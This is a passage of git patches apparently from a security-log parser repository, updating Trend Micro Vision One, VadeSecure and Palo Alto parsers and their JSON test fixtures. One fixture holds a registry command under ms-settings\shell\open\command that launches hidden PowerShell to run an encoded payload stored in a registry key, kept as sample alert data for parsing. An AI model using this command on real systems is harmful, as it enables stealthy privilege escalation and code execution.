index 7a3ee9d51..742eee7cc 100644
--- a/Trend Micro/trend-micro-vision-one/_meta/smart-descriptions.json	
+++ b/Trend Micro/trend-micro-vision-one/_meta/smart-descriptions.json	
@@ -1,4 +1,8 @@
 [
+  {
+    "value": "{event.reason} on {host.ip}",
+    "conditions": [{ "field": "event.reason" }, { "field": "host.ip" }]
+  },
   {
     "value": "{event.reason}",
     "conditions": [{ "field": "event.reason" }]

From 7b8703b20c6bbccf5d801d9dda0f06c9b05431ce Mon Sep 17 00:00:00 2001
From: lvoloshyn-sekoia <leonid.voloshyn@sekoia.io>
Date: Wed, 20 Nov 2024 12:24:27 +0200
Subject: [PATCH 256/317] Fixes and improvements

---
 .../trend-micro-vision-one/ingest/parser.yml  | 22 +++++++++++--------
 .../tests/test_registry.json                  |  3 ++-
 2 files changed, 15 insertions(+), 10 deletions(-)

diff --git a/Trend Micro/trend-micro-vision-one/ingest/parser.yml b/Trend Micro/trend-micro-vision-one/ingest/parser.yml
index be400399d..a13ee54b2 100644
--- a/Trend Micro/trend-micro-vision-one/ingest/parser.yml	
+++ b/Trend Micro/trend-micro-vision-one/ingest/parser.yml	
@@ -39,14 +39,19 @@ stages:
 
           event.url: "{{parsed_event.message.model.workbenchLink}}"
 
+      - set:
           process.command_line: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'processCmd') | first).value }}"
           process.parent.command_line: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'parentCmd') | first).value }}"
+          process.executable: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'processFilePath') | first).value }}"
+          process.parent.executable: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'parentFilePath') | first).value }}"
+          process.hash.sha1: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'processFileHashSha1') | first).value }}"
+          process.hash.sha256: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'processFileHashSha256') | first).value }}"
+          process.pid: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'objectPid') | first).value }}"
 
+      - set:
           registry.hive: "{{ (parsed_event.message.indicators | selectattr('type', 'equalto', 'registry_key') | first).value.split('\\\\')[0] }}"
           registry.key: "{{ (parsed_event.message.indicators | selectattr('type', 'equalto', 'registry_key') | first).value.split('\\\\')[1:] | join('\\\\') }}"
-
           registry.value: "{{ (parsed_event.message.indicators | selectattr('type', 'equalto', 'registry_value') | first).value }}"
-
           registry.path: >
             {%- set path = [] -%}
             {%- for indicator in parsed_event.message.indicators -%}
@@ -57,22 +62,21 @@ stages:
             {%- endfor -%}
             {%- if path | length > 0 -%}{{ path | join('\\') }}{%- endif -%}
 
-          # @todo should be along with registry.data.type to REG_SZ
           registry.data.strings: "{{ (parsed_event.message.indicators | selectattr('type', 'equalto', 'registry_value_data') | first).value }}"
 
+      - set:
+          registry.data.type: "REG_SZ"
+        filter: "{{final.registry.data.strings != null }}"
+
+      - set:
           file.hash.sha1: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'objectFileHashSha1') | first).value }}"
           file.hash.sha256: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'objectFileHashSha256') | first).value }}"
           file.path: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'objectFilePath') | first).value or (parsed_event.message.indicators | selectattr('field', 'equalto', 'filePath') | first).value}}"
           file.name: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'fileName') | first).value }}"
 
-          process.executable: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'processFilePath') | first).value }}"
-          process.parent.executable: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'parentFilePath') | first).value }}"
-          process.hash.sha1: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'processFileHashSha1') | first).value }}"
-          process.hash.sha256: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'processFileHashSha256') | first).value }}"
-          process.pid: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'objectPid') | first).value }}"
-
           user.name: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'logonUser') | first).value }}"
 
+      - set:
           trendmicro.vision_one.severity: "{{parsed_event.message.severity}}"
           trendmicro.vision_one.incident_id: "{{parsed_event.message.incidentId}}"
           trendmicro.vision_one.case_id: "{{parsed_event.message.caseId}}"
diff --git a/Trend Micro/trend-micro-vision-one/tests/test_registry.json b/Trend Micro/trend-micro-vision-one/tests/test_registry.json
index f9873edf1..3c32834ae 100644
--- a/Trend Micro/trend-micro-vision-one/tests/test_registry.json	
+++ b/Trend Micro/trend-micro-vision-one/tests/test_registry.json	
@@ -41,7 +41,8 @@
     },
     "registry": {
       "data": {
-        "strings": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -NoP -NonI -W Hidden -c $x=$((gp HKCU:Software\\Microsoft\\Windows Update).Update); powershell -NoP -NonI -W Hidden -enc $x"
+        "strings": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -NoP -NonI -W Hidden -c $x=$((gp HKCU:Software\\Microsoft\\Windows Update).Update); powershell -NoP -NonI -W Hidden -enc $x",
+        "type": "REG_SZ"
       },
       "hive": "hkcr",
       "key": "ms-settings\\shell\\open\\command",

From bc86ba96e28498fa916cca216790f5b8094d6d16 Mon Sep 17 00:00:00 2001
From: lvoloshyn-sekoia <leonid.voloshyn@sekoia.io>
Date: Wed, 20 Nov 2024 15:51:21 +0200
Subject: [PATCH 257/317] Add test

---
 .../tests/test_internal_network_scanner.json  | 74 +++++++++++++++++++
 1 file changed, 74 insertions(+)
 create mode 100644 Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json

diff --git a/Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json b/Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json
new file mode 100644
index 000000000..e6bcf0088
--- /dev/null
+++ b/Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json	
@@ -0,0 +1,74 @@
+{
+  "input": {
+    "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000?ref=7ddf32e17a6ac5ce04a8ecbf782ca509\", \"alertProvider\": \"SAE\", \"modelId\": \"fc93e58b-142a-46bd-89b3-0670004728da\", \"model\": \"Internal Network Scanner\", \"modelType\": \"preset\", \"score\": 22, \"severity\": \"low\", \"createdDateTime\": \"2024-07-23T14:46:11Z\", \"updatedDateTime\": \"2024-07-23T14:46:11Z\", \"ownerIds\": [], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 1, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"john\\\\doe\", \"entityId\": \"john\\\\doe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\", \"name\": \"doe10\", \"ips\": [\"1.2.3.4\"]}, \"entityId\": \"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\", \"relatedEntities\": [\"john\\\\doe\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7, 8], \"provenance\": [\"Sweeping\", \"Alert\"], \"managementScopeGroupId\": \"a008286d-c35c-4b85-85bb-6c744b27c2e7\"}]}, \"description\": \"Detects usage of network scanner to gather information\", \"matchedRules\": [{\"id\": \"1382c167-1c06-4312-89bd-2db0573a0a3e\", \"name\": \"Internal Network Scanning\", \"matchedFilters\": [{\"id\": \"95fa94aa-126d-40a1-92dd-e4427da20897\", \"name\": \"Internal Network Scanning via Famatech Scanner Tools\", \"matchedDateTime\": \"2024-07-23T14:41:48.126Z\", \"mitreTechniqueIds\": [\"T1046\"], \"matchedEvents\": [{\"uuid\": \"47028c1b-ba5b-45ec-98b0-2f62b8ee1665\", \"matchedDateTime\": \"2024-07-23T14:41:48.126Z\", \"type\": \"TELEMETRY_PROCESS\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"C:\\\\WINDOWS\\\\Explorer.EXE\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"\\\"C:\\\\Users\\\\doe.john\\\\Downloads\\\\Advanced_IP_Scanner_2.5.4594.1.exe\\\" \", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"file_sha256\", \"field\": \"objectFileHashSha256\", \"value\": \"E665BB196B40DBB0FA91DBB908DB7DA5065BA28DF9F445AD97C17DF180FF43A1\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"B9AB76C0E991FED29CF07956B7B5E758DB91BEF52E4C0FA810FEF88000506631\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Windows\\\\explorer.exe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"fullpath\", \"field\": \"objectFilePath\", \"value\": \"C:\\\\Users\\\\doe.john\\\\Downloads\\\\Advanced_IP_Scanner_2.5.4594.1.exe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"user_account\", \"field\": \"logonUser\", \"value\": \"doe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Related Asset Enrichment\", \"Alert\"]}, {\"id\": 8, \"type\": \"user_account\", \"field\": \"\", \"value\": \"Syst\\u00e8me\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [], \"provenance\": [\"Related Asset Enrichment\"]}]}"
+  },
+  "expected": {
+    "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000?ref=0c12e642ca5b7ed4436e5f23f568ae10066608d3\", \"alertProvider\": \"SAE\", \"modelId\": \"fc93e58b-142a-46bd-89b3-0670004728da\", \"model\": \"Internal Network Scanner\", \"modelType\": \"preset\", \"score\": 22, \"severity\": \"low\", \"createdDateTime\": \"2024-07-23T14:46:11Z\", \"updatedDateTime\": \"2024-07-23T14:46:11Z\", \"ownerIds\": [], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 1, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"john\\\\doe\", \"entityId\": \"john\\\\doe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\", \"name\": \"doe10\", \"ips\": [\"1.2.3.4\"]}, \"entityId\": \"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\", \"relatedEntities\": [\"john\\\\doe\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7, 8], \"provenance\": [\"Sweeping\", \"Alert\"], \"managementScopeGroupId\": \"a008286d-c35c-4b85-85bb-6c744b27c2e7\"}]}, \"description\": \"Detects usage of network scanner to gather information\", \"matchedRules\": [{\"id\": \"1382c167-1c06-4312-89bd-2db0573a0a3e\", \"name\": \"Internal Network Scanning\", \"matchedFilters\": [{\"id\": \"95fa94aa-126d-40a1-92dd-e4427da20897\", \"name\": \"Internal Network Scanning via Famatech Scanner Tools\", \"matchedDateTime\": \"2024-07-23T14:41:48.126Z\", \"mitreTechniqueIds\": [\"T1046\"], \"matchedEvents\": [{\"uuid\": \"47028c1b-ba5b-45ec-98b0-2f62b8ee1665\", \"matchedDateTime\": \"2024-07-23T14:41:48.126Z\", \"type\": \"TELEMETRY_PROCESS\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"C:\\\\WINDOWS\\\\Explorer.EXE\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"\\\"C:\\\\Users\\\\doe.john\\\\Downloads\\\\Advanced_IP_Scanner_2.5.4594.1.exe\\\" \", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"file_sha256\", \"field\": \"objectFileHashSha256\", \"value\": \"E665BB196B40DBB0FA91DBB908DB7DA5065BA28DF9F445AD97C17DF180FF43A1\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"B9AB76C0E991FED29CF07956B7B5E758DB91BEF52E4C0FA810FEF88000506631\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Windows\\\\explorer.exe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"fullpath\", \"field\": \"objectFilePath\", \"value\": \"C:\\\\Users\\\\doe.john\\\\Downloads\\\\Advanced_IP_Scanner_2.5.4594.1.exe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"user_account\", \"field\": \"logonUser\", \"value\": \"doe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Related Asset Enrichment\", \"Alert\"]}, {\"id\": 8, \"type\": \"user_account\", \"field\": \"\", \"value\": \"Syst\\u00e8me\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [], \"provenance\": [\"Related Asset Enrichment\"]}]}",
+    "event": {
+      "category": [
+        "intrusion_detection"
+      ],
+      "kind": "alert",
+      "reason": "Internal Network Scanner",
+      "type": [
+        "info"
+      ]
+    },
+    "@timestamp": "2024-07-23T14:46:11Z",
+    "file": {
+      "directory": "C:\\Users\\doe.john\\Downloads",
+      "hash": {
+        "sha256": "E665BB196B40DBB0FA91DBB908DB7DA5065BA28DF9F445AD97C17DF180FF43A1"
+      },
+      "name": "Advanced_IP_Scanner_2.5.4594.1.exe",
+      "path": "C:\\Users\\doe.john\\Downloads\\Advanced_IP_Scanner_2.5.4594.1.exe"
+    },
+    "host": {
+      "ip": [
+        "1.2.3.4"
+      ],
+      "name": "doe10"
+    },
+    "observer": {
+      "product": "Vision One",
+      "vendor": "TrendMicro"
+    },
+    "organization": {
+      "id": "john\\doe",
+      "name": "john\\doe"
+    },
+    "process": {
+      "command_line": "C:\\WINDOWS\\Explorer.EXE",
+      "executable": "C:\\Windows\\explorer.exe",
+      "hash": {
+        "sha256": "B9AB76C0E991FED29CF07956B7B5E758DB91BEF52E4C0FA810FEF88000506631"
+      }
+    },
+    "related": {
+      "hash": [
+        "B9AB76C0E991FED29CF07956B7B5E758DB91BEF52E4C0FA810FEF88000506631",
+        "E665BB196B40DBB0FA91DBB908DB7DA5065BA28DF9F445AD97C17DF180FF43A1"
+      ],
+      "ip": [
+        "1.2.3.4"
+      ],
+      "user": [
+        "doe"
+      ]
+    },
+    "rule": {
+      "name": "Internal Network Scanner"
+    },
+    "trendmicro": {
+      "vision_one": {
+        "alert_id": "WB-11111-22222222-00000",
+        "investigation_status": "New",
+        "severity": "low",
+        "status": "Open"
+      }
+    },
+    "user": {
+      "name": "doe"
+    }
+  }
+}
\ No newline at end of file

From f2de94f0d1331ad57d49d1dcd514a59ee4fce317 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?L=C3=A9na=C3=AFg?=
 <126670263+LenaigKaliou@users.noreply.github.com>
Date: Wed, 20 Nov 2024 16:13:59 +0100
Subject: [PATCH 258/317] Update VadeSecure/vade_secure_m365/_meta/fields.yml
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Co-authored-by: Sébastien Quioc <sebastien.quioc@sekoia.fr>
---
 VadeSecure/vade_secure_m365/_meta/fields.yml | 18 ++++++++++++++----
 1 file changed, 14 insertions(+), 4 deletions(-)

diff --git a/VadeSecure/vade_secure_m365/_meta/fields.yml b/VadeSecure/vade_secure_m365/_meta/fields.yml
index a3f60b15c..3dae6aab9 100644
--- a/VadeSecure/vade_secure_m365/_meta/fields.yml
+++ b/VadeSecure/vade_secure_m365/_meta/fields.yml
@@ -58,10 +58,20 @@ vadesecure.attachments:
   short: vadesecure.to_header
   type: array
 
-vadesecure.auth_results_details:
-  description: Details of security protocols, mostly SPF, DKIM and DMARC.
-  name: vadesecure.auth_results_details
-  type: object
+vadesecure.auth_results_details.spf:
+  description: The result of the Sender Policy Framework (SPF)
+  name: vadesecure.auth_results_details.spf
+  type: keyword
+
+vadesecure.auth_results_details.dkim:
+  description: The result of the DomainKeys Identified Mail (DKIM)
+  name: vadesecure.auth_results_details.dkim
+  type: keyword
+
+vadesecure.auth_results_details.dmarc:
+  description: Result of the Domand-based Message Authentication Reporting and Conformance (DMARC)
+  name: vadesecure.auth_results_details.dmarc
+  type: keyword
 
 vadesecure.campaign.actions:
   description: The actions carried out for the remediation campaign.

From 89031da02131389356f2da10693a5c1a31cbdac1 Mon Sep 17 00:00:00 2001
From: LenaigKaliou <lenaigk@protonmail.com>
Date: Wed, 20 Nov 2024 16:17:44 +0100
Subject: [PATCH 259/317] fix on linting

---
 VadeSecure/vade_secure_m365/_meta/fields.yml | 13 +++++++------
 1 file changed, 7 insertions(+), 6 deletions(-)

diff --git a/VadeSecure/vade_secure_m365/_meta/fields.yml b/VadeSecure/vade_secure_m365/_meta/fields.yml
index 3dae6aab9..45923af39 100644
--- a/VadeSecure/vade_secure_m365/_meta/fields.yml
+++ b/VadeSecure/vade_secure_m365/_meta/fields.yml
@@ -58,21 +58,22 @@ vadesecure.attachments:
   short: vadesecure.to_header
   type: array
 
-vadesecure.auth_results_details.spf:
-  description: The result of the Sender Policy Framework (SPF)
-  name: vadesecure.auth_results_details.spf
-  type: keyword
-
 vadesecure.auth_results_details.dkim:
   description: The result of the DomainKeys Identified Mail (DKIM)
   name: vadesecure.auth_results_details.dkim
   type: keyword
 
 vadesecure.auth_results_details.dmarc:
-  description: Result of the Domand-based Message Authentication Reporting and Conformance (DMARC)
+  description: Result of the Domand-based Message Authentication Reporting and Conformance
+    (DMARC)
   name: vadesecure.auth_results_details.dmarc
   type: keyword
 
+vadesecure.auth_results_details.spf:
+  description: The result of the Sender Policy Framework (SPF)
+  name: vadesecure.auth_results_details.spf
+  type: keyword
+
 vadesecure.campaign.actions:
   description: The actions carried out for the remediation campaign.
   name: vadesecure.campaign.actions

From ddb81e469ab08e04985947091be03113e7236a49 Mon Sep 17 00:00:00 2001
From: Sebastien Quioc <sebastien.quioc@sekoia.fr>
Date: Wed, 20 Nov 2024 18:08:00 +0100
Subject: [PATCH 260/317] chore(PaloAlto): name some columns

---
 Palo Alto Networks/paloalto-ngfw/ingest/parser.yml | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)

diff --git a/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml b/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml
index 2f8b22f2a..c81ad890e 100644
--- a/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml	
+++ b/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml	
@@ -142,7 +142,7 @@ pipeline:
         input_field: original.message
         output_field: message
         columnnames:
-          - FUTURE_USER
+          - PaloAltoDomain
           - ReceiveTime
           - DeviceSN
           - Type
@@ -187,12 +187,12 @@ pipeline:
         input_field: original.message
         output_field: message
         columnnames:
-          - FUTURE_USE
+          - PaloAltoDomain
           - ReceiveTime
           - DeviceSN
           - Type
           - Subtype
-          - FUTURE_USE
+          - ConfigVersion
           - GeneratedTime
           - VirtualLocation
           - EventID

From 03c2c78afb7a413856adddbbe760f167de860cd8 Mon Sep 17 00:00:00 2001
From: Sebastien Quioc <sebastien.quioc@sekoia.fr>
Date: Wed, 20 Nov 2024 18:08:44 +0100
Subject: [PATCH 261/317] fix(PaloAlto): fix the definition of the user
 properties

---
 Palo Alto Networks/paloalto-ngfw/ingest/parser.yml          | 4 ++--
 .../paloalto-ngfw/tests/network_threat_alert_2.json         | 6 +++---
 .../paloalto-ngfw/tests/test_file_alert_json.json           | 6 +++---
 Palo Alto Networks/paloalto-ngfw/tests/wildfire1_json.json  | 6 +++---
 4 files changed, 11 insertions(+), 11 deletions(-)

diff --git a/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml b/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml
index c81ad890e..b7ec21cac 100644
--- a/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml	
+++ b/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml	
@@ -810,8 +810,8 @@ stages:
           user.name: '{{final.user.name.split("\\") | last}}'
         filter: '{{final.user.name != null and "\\" in final.user.name}}'
       - set:
-          user.domain: '{{final.user.email.split("@") | first}}'
-          user.name: '{{final.user.email.split("@") | last}}'
+          user.domain: '{{final.user.email.split("@") | last}}'
+          user.name: '{{final.user.email.split("@") | first}}'
         filter: '{{final.user.email != null and "@" in final.user.email}}'
       - set:
           source.user.domain: '{{final.source.user.name.split("\\") | first}}'
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/network_threat_alert_2.json b/Palo Alto Networks/paloalto-ngfw/tests/network_threat_alert_2.json
index e8c257c69..f1e6cf2ad 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/network_threat_alert_2.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/network_threat_alert_2.json	
@@ -84,7 +84,7 @@
         "8.7.6.5"
       ],
       "user": [
-        "example.org",
+        "jdoe",
         "jdoe@example.org"
       ]
     },
@@ -117,9 +117,9 @@
       "top_level_domain": "com"
     },
     "user": {
-      "domain": "jdoe",
+      "domain": "example.org",
       "email": "jdoe@example.org",
-      "name": "example.org"
+      "name": "jdoe"
     },
     "user_agent": {
       "name": "Microsoft NCSI"
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_file_alert_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_file_alert_json.json
index 3142ed671..e48b985ca 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_file_alert_json.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_file_alert_json.json	
@@ -76,7 +76,7 @@
         "9.10.11.12"
       ],
       "user": [
-        "example.com",
+        "john.doe",
         "john.doe@example.com"
       ]
     },
@@ -97,9 +97,9 @@
       }
     },
     "user": {
-      "domain": "john.doe",
+      "domain": "example.com",
       "email": "john.doe@example.com",
-      "name": "example.com"
+      "name": "john.doe"
     }
   }
 }
\ No newline at end of file
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/wildfire1_json.json b/Palo Alto Networks/paloalto-ngfw/tests/wildfire1_json.json
index edd76521b..4962d00cc 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/wildfire1_json.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/wildfire1_json.json	
@@ -82,7 +82,7 @@
         "8.7.6.5"
       ],
       "user": [
-        "example.org",
+        "john.doe",
         "john.doe@example.org"
       ]
     },
@@ -103,9 +103,9 @@
       }
     },
     "user": {
-      "domain": "john.doe",
+      "domain": "example.org",
       "email": "john.doe@example.org",
-      "name": "example.org"
+      "name": "john.doe"
     }
   }
 }
\ No newline at end of file

From 5763f40af5d8945417a9c7383753d6b97a2ab79a Mon Sep 17 00:00:00 2001
From: Sebastien Quioc <sebastien.quioc@sekoia.fr>
Date: Wed, 20 Nov 2024 18:09:32 +0100
Subject: [PATCH 262/317] test(PaloAlto): add test for hipmatch event in json
 representation

---
 .../tests/test_hipmatch_json.json             | 72 +++++++++++++++++++
 1 file changed, 72 insertions(+)
 create mode 100644 Palo Alto Networks/paloalto-ngfw/tests/test_hipmatch_json.json

diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_hipmatch_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_hipmatch_json.json
new file mode 100644
index 000000000..952e819e2
--- /dev/null
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_hipmatch_json.json	
@@ -0,0 +1,72 @@
+{
+  "input": {
+    "message": "{\"TimeReceived\":\"2024-11-20T16:30:32.000000Z\",\"DeviceSN\":\"no-serial\",\"LogType\":\"HIPMATCH\",\"Subtype\":\"hipmatch\",\"ConfigVersion\":\"10.2\",\"TimeGenerated\":\"2024-11-20T16:30:28.000000Z\",\"SourceUser\":\"jdoe@example.org\",\"VirtualLocation\":\"vsys1\",\"EndpointDeviceName\":\"DESKTOP-01\",\"EndpointOSType\":\"Windows\",\"SourceIP\":\"1.2.3.4\",\"HipMatchName\":\"VPN Compliant\",\"RepeatCount\":1,\"CountOfRepeats\":1,\"HipMatchType\":\"profile\",\"SequenceNo\":1111111111111111111,\"DGHierarchyLevel1\":12,\"DGHierarchyLevel2\":22,\"DGHierarchyLevel3\":0,\"DGHierarchyLevel4\":0,\"VirtualSystemName\":\"\",\"DeviceName\":\"FW-ALK01\",\"VirtualSystemID\":1,\"SourceIPv6\":\"\",\"HostID\":\"3a7393a4-997f-4e5b-b6e4-4ebff71dacf4\",\"EndpointSerialNumber\":\"aefee8\",\"SourceDeviceCategory\":null,\"SourceDeviceProfile\":null,\"SourceDeviceModel\":null,\"SourceDeviceVendor\":null,\"SourceDeviceOSFamily\":null,\"SourceDeviceOSVersion\":null,\"SourceDeviceMac\":null,\"SourceDeviceHost\":null,\"Source\":null,\"TimestampDeviceIdentification\":null,\"TimeGeneratedHighResolution\":\"2024-11-20T16:30:28.904000Z\"}",
+    "sekoiaio": {
+      "intake": {
+        "dialect": "Palo Alto NGFW",
+        "dialect_uuid": "903ec1b8-f206-4ba5-8563-db21da09cafd"
+      }
+    }
+  },
+  "expected": {
+    "message": "{\"TimeReceived\":\"2024-11-20T16:30:32.000000Z\",\"DeviceSN\":\"no-serial\",\"LogType\":\"HIPMATCH\",\"Subtype\":\"hipmatch\",\"ConfigVersion\":\"10.2\",\"TimeGenerated\":\"2024-11-20T16:30:28.000000Z\",\"SourceUser\":\"jdoe@example.org\",\"VirtualLocation\":\"vsys1\",\"EndpointDeviceName\":\"DESKTOP-01\",\"EndpointOSType\":\"Windows\",\"SourceIP\":\"1.2.3.4\",\"HipMatchName\":\"VPN 